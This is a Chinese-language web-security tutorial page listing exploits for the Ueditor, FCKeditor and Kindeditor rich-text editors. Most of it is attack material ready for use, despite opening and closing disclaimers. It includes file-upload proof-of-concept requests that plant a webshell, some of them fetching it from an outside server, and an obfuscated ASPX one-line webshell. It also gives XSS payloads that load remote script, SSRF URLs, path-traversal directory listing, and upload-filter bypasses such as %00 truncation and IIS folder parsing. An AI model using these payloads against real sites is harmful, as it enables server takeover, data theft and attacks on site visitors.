技术教程 编程教程 Ueditor、FCKeditor、Kindeditor编辑器漏洞 正文

Ueditor、FCKeditor、Kindeditor编辑器漏洞

2023-02-14,,,,

Ueditor、FCKeditor、Kindeditor编辑器漏洞

免责声明:
Ueditor编辑器漏洞
文件上传漏洞
XSS漏洞
SSRF漏洞
FCKeditor编辑器漏洞
查看FCKeditor版本
测试上传点
列目录
突破限制
Kindeditor编辑器漏洞
上传地址
查看版本信息
根本脚本语言自定义不同的上传地址,上传之前有必要验证文件upload_json.*的存在
上传poc
免责声明:

免责声明:

本文章仅供学习和研究使用,严禁使用该文章内容对互联网其他应用进行非法操作,若将其用于非法目的,所造成的后果由您自行承担,产生的一切风险与本文作者无关,如继续阅读该文章即表明您默认遵守该内容。

Ueditor编辑器漏洞

文件上传漏洞

    NET版本文件上传
    该任意文件上传漏洞存在于1.4.3.3、1.5.0和1.3.6版本中,并且只有.NET版本受该漏洞影响。黑客可以利用该漏洞上传木马文件,执行命令控制服务器。
    该漏洞是由于上传文件时,使用的CrawlerHandler类未对文件类型进行检验,导致了任意文件上传。1.4.3.3和1.5.0版本利用方式稍有不同,1.4.3.3需要一个能正确解析的域名。而1.5.0用IP和普通域名都可以。相对来说1.5.0版本更加容易触发此漏洞;而在1.4.3.3版本中攻击者需要提供一个正常的域名地址就可以绕过判断;
    (1) ueditor .1.5.0.net版本
    首先1.5.0版本进行测试,需要先在外网服务器上传一个图片木马,比如:1.jpg/1.gif/1.png都可以,下面x.x.x.x是外网服务器地址,source[]参数值改为图片木马地址,并在结尾加上“?.aspx”即可getshell,利用POC:
POST /ueditor/net/controller.ashx?action=catchimage

source%5B%5D=http%3A%2F%2Fx.x.x.x/1.gif?.aspx

(2) ueditor.1.4.3.3 .net版
1.本地构造一个html,因为不是上传漏洞所以enctype 不需要指定为multipart/form-data, 之前见到有poc指定了这个值。完整的poc如下:

<form action="http://xxxxxxxxx/ueditor/net/controller.ashx?action=catchimage" enctype="application/x-www-form-urlencoded"  method="POST">  <p>shell addr: <input type="text" name="source[]" /></p >  <input type="submit" value="Submit" /></form>

2.需准备一个图片马儿,远程shell地址需要指定扩展名为 1.gif?.aspx,1.gif图片木马(一句话木马:密码:hello)如下:

GIF89a<script runat="server" language="JScript">   function popup(str) {       var q = "u";       var w = "afe";       var a = q + "ns" + w; var b= eval(str,a); return(b);  }</script><% popup(popup(System.Text.Encoding.GetEncoding(65001). GetString(System.Convert.FromBase64String("UmVxdWVzdC5JdGVtWyJoZWxsbyJd")))); %>

(3) ueditor.1.3.6 .net1版本
使用%00截断的方式上传绕过

(4) PHP版本的文件上传
利用poc:

POST http://localhost/ueditor/php/action_upload.php?action=uploadimage&amp;CONFIG[imagePathFormat]=ueditor/php/upload/fuck&amp;CONFIG[imageMaxSize]=9999999&amp;CONFIG[imageAllowFiles][]=.php&amp;CONFIG[imageFieldName]=fuck HTTP/1.1Host: localhostConnection: keep-aliveContent-Length: 222Cache-Control: max-age=0Origin: nullUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML,like Gecko) Chrome/60.0.3112.78 Safari/537.36Content-Type: multipart/form-data; boundary=——WebKitFormBoundaryDMmqvK6b3ncX4xxAAccept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4———WebKitFormBoundaryDMmqvK6b3ncX4xxAContent-Disposition: form-data; name="fuck"; filename="fuck.php"Content-Type: application/octet-stream<?php phpinfo();?>———WebKitFormBoundaryDMmqvK6b3ncX4xxA—

shell路径由CONFIG[imagePathFormat]=ueditor/php/upload/fuck决定http://localhost/ueditor/php/upload/fuck.php

XSS漏洞

弹窗

<html>

<head></head>

<body>

<something:script xmlns:something="http://www.w3.org/1999/xhtml">

alert(1);

</something:script>

</body>

</html>

URL跳转

<html>

<head></head>

<body>

<something:script xmlns:something="http://www.w3.org/1999/xhtml">

window.location.href="https://www.t00ls.net/";

</something:script>

</body>

</html>

远程加载Js

<html>

<head></head>

<body>

<something:script src="http://xss.com/xss.js" xmlns:something="http://www.w3.org/1999/xhtml">

</something:script>

</body>

</html>

如果找不到上传xml文件的地方可以用下面的payload

POST /edit/php/controller.php?action=uploadfile HTTP/1.1

Host: www.baidu.com

Cookie: PHPSESSID=5eoic6stihj2j5oeaila86v7vk;

Content-Length: 351

Cache-Control: max-age=0

Sec-Ch-Ua: " Not;A Brand";v="99", "Google Chrome";v="97", "Chromium";v="97"

Sec-Ch-Ua-Mobile: ?0

Sec-Ch-Ua-Platform: "Windows"

Upgrade-Insecure-Requests: 1

Origin: https://www.baidu.com

Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKDwVp6zo1JCNDZ55

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Sec-Fetch-Site: same-origin

Sec-Fetch-Mode: navigate

Sec-Fetch-User: ?1

Sec-Fetch-Dest: iframe

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9

Connection: close

------WebKitFormBoundaryKDwVp6zo1JCNDZ55

Content-Disposition: form-data; name="upfile"; filename="test.xml"

Content-Type: image/jpeg

<html>

<head></head>

<body>

<something:script xmlns:something="http://www.w3.org/1999/xhtml"> alert(/只是一个漏洞测试/);

</something:script>

</body>

</html>

------WebKitFormBoundaryKDwVp6zo1JCNDZ55--

config.json文件可以查看上传的接口名称和接口支持的后缀

/ueditor/asp/config.json

/ueditor/net/config.json

/ueditor/php/config.json

/ueditor/jsp/config.json

config.json文件可以看到能够列出已经上传的文件的接口路径

/ueditor/net/controller.ashx?action=listfile

/ueditor/net/controller.ashx?action=listimage

上传文件路径

/ueditor/index.html

/ueditor/asp/controller.asp?action=uploadimage

/ueditor/asp/controller.asp?action=uploadfile

/ueditor/net/controller.ashx?action=uploadimage

/ueditor/net/controller.ashx?action=uploadfile

/ueditor/php/controller.php?action=uploadfile

/ueditor/php/controller.php?action=uploadimage

/ueditor/jsp/controller.jsp?action=uploadfile

/ueditor/jsp/controller.jsp?action=uploadimage

SSRF漏洞

/ueditor/jsp/getRemoteImage.jsp?upfile=http://127.0.0.1/favicon.ico?.jpg

/ueditor/jsp/controller.jsp?action=catchimage&source[]=https://www.baidu.com/img/baidu_jgylogo3.gif

/ueditor/php/controller.php?action=catchimage&source[]=https://www.baidu.com/img/baidu_jgylogo3.gif

FCKeditor编辑器漏洞

查看FCKeditor版本

http://127.0.0.1/fckeditor/editor/dialog/fck_about.html

http://127.0.0.1/FCKeditor/_whatsnew.html

测试上传点

FCKeditor/editor/filemanager/browser/default/connectors/test.html

FCKeditor/editor/filemanager/upload/test.html

FCKeditor/editor/filemanager/connectors/test.html

FCKeditor/editor/filemanager/connectors/uploadtest.html

FCKeditor/_samples/default.html

FCKeditor/_samples/asp/sample01.asp

FCKeditor/_samples/asp/sample02.asp

FCKeditor/_samples/asp/sample03.asp

FCKeditor/_samples/asp/sample04.asp

FCKeditor/_samples/default.html

FCKeditor/editor/fckeditor.htm

FCKeditor/editor/fckdialog.html

FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/

FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/

FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/

FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector.jsp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/

FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com/fckeditor/editor/filemanager/connectors/php/connector.php

FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com/fckeditor/editor/filemanager/connectors/asp/connector.asp

FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com/fckeditor/editor/filemanager/connectors/aspx/connector.aspx

FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com/fckeditor/editor/filemanager/connectors/jsp/connector.jsp

FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp

FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.jsp

fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/aspx/connector.Aspx

fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/php/connector.php

列目录

FCKeditor/editor/fckeditor.html

FCKeditor/editor/fckeditor.html不可以上传文件,可以点击上传图片按钮再选择浏览服务器即可跳转至可上传文件页,可以查看已经上传的文件。

根据xml返回信息查看网站目录

http://127.0.0.1/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../../&NewFolderName=shell.asp

获取当前文件夹

FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/

FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/

FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/

浏览盘符文件

/FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=e:/

爆网站绝对路径

FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/xx.asp&NewFolderName=x.asp

修改CurrentFolder 参数使用 …/…/来进入不同的目录

FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=shell.asp

JSP 版本:

FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=%2F

突破限制

上传限制
上传限制的突破方式很多,主要还是抓包改扩展名,%00截断,添加文件头等
文件名限制
二次上传绕过文件名‘ . ’ 修改为‘ _ ’
FCK在上传了诸如shell.asp;.jpg的文件后,会自动将文件名改为shell_asp;.jpg。可以继续上传同名文件,文件名会变为shell.asp;(1).jpg
提交shell.php+空格绕过
空格只支持windows系统,linux系统是不支持的,可提交shell.php+空格来绕过文件名限制。
IIS6.0突破文件夹限制

Fckeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=File&CurrentFolder=/shell.asp&NewFolderName=z.asp

FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/shell.asp&NewFolderName=z&uuid=1244789975684

FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolder&CurrentFolder=/&Type=Image&NewFolderName=shell.asp

文件解析限制
通过Fckeditor编辑器在文件上传页面中,创建诸如1.asp文件夹,然后再到该文件夹下上传一个图片的webshell文件,获取其shell。
http://127.0.0.1/images/upload/201806/image/1.asp/1.jpg

FCKeditor v2.4.3

FCKeditor v2.4.3中File类别默认拒绝上传类型:

html|htm|php|php2|php3|php4|php5|phtml|pwml|inc|asp|aspx|ascx|jsp|cfm|cfc|pl|bat|exe|com|dll|vbs|js|reg|cgi|htaccess|asis|sh|shtml|shtm|phtm

但是保存的文件直接用的$sFilePath = $sServerDir . $sFileName,而没有使用$sExtension为后缀,

直接导致在win下在上传文件后面加个.来突破,也可以利用2003解析漏洞建立xxx.asp文件夹或者上传xx.asp;.jpg!

Fckeditor 2.0 <= 2.2

Fckeditor 2.0 <= 2.2允许上传asa、cer、php2、php4、inc、pwml、pht后缀的文件,也可以在win下在上传文件后面加个.来突破,在apache下,"Apache文件名解析缺陷漏洞"也可以利用,如上传cer文件

.htaccess方式

对于有些没有限制.htaccess文件上传成功到服务器的.htaccess文件里的代码可以让 .jpg后缀名文件格式的文件名以php格式解析,

先上传.htaccess文件,再上传图片马即可。

Kindeditor编辑器漏洞

上传地址

kindeditor/asp/upload_json.asp?dir=file

kindeditor/asp.net/upload_json.ashx?dir=file

kindeditor/jsp/upload_json.jsp?dir=file

kindeditor/php/upload_json.php?dir=file

查看版本信息

http://127.0.0.1/kindeditor/kindeditor.js

根本脚本语言自定义不同的上传地址,上传之前有必要验证文件upload_json.*的存在

/asp/upload_json.asp

/asp.net/upload_json.ashx

/jsp/upload_json.jsp

/php/upload_json.php

可以上传

上传poc

<html><head>

<title>Uploader By ICE</title>

<script src="http://[Target]/kindeditor/kindeditor-min.js"></script>

<script>

KindEditor.ready(function(K) {

var uploadbutton = K.uploadbutton({

button : K('#uploadButton')[0],

fieldName : 'imgFile',

url : 'http://[Target]/kindeditor/php/upload_json.asp?dir=file',

afterUpload : function(data) {

if (data.error === 0) {

var url = K.formatUrl(data.url, 'absolute');

K('#url').val(url);}

},

});

uploadbutton.fileBox.change(function(e) {

uploadbutton.submit();

});

});

</script></head><body>

<div class="upload">

<input class="ke-input-text" type="text" id="url" value="" readonly="readonly" />

<input type="button" id="uploadButton" value="Upload" />

</div>

</body>

</html>

免责声明:

仅限授权安全测试使用,禁止未授权非法攻击站点。本文章仅供学习和研究使用。严禁使用该文章内容对互联网其他应用进行非法操作,若将其用于非法目的,所造成的后果由您自行承担,产生的一切风险与本文作者无关,如继续阅读该文章即表明您默认遵守该内容。

Ueditor、FCKeditor、Kindeditor编辑器漏洞的相关教程结束。

《Ueditor、FCKeditor、Kindeditor编辑器漏洞.doc》

下载本文的Word格式文档,以方便收藏与打印。

Copyright 2023. 昆居客 - IT编程,互联网信息技术文档大全!